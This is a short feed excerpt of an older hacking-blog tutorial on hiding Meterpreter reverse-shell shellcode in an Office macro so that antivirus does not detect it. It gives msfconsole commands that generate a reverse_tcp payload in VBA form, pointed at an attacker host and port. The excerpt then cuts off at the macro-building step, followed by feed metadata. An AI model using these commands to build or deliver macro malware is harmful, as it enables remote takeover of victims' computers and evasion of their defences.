Article: Get shell Using Shellcode in Macro. - published about 11 years ago. Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/meterpreter/reverse_tcp set LHOST 192.168.56.102 set LPORT 443 generate -t vba exploit Now we have generated our shellcode. Now we will create macro. (1)Ope... https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html Published: 2013 10 18 09:42:00 Received: 2024 02 20 16:43:00 Feed: Hacking and Tricks Source: Hacking and Tricks Category: Cyber Security Topic: Cyber Security |
Click to Open Code Editor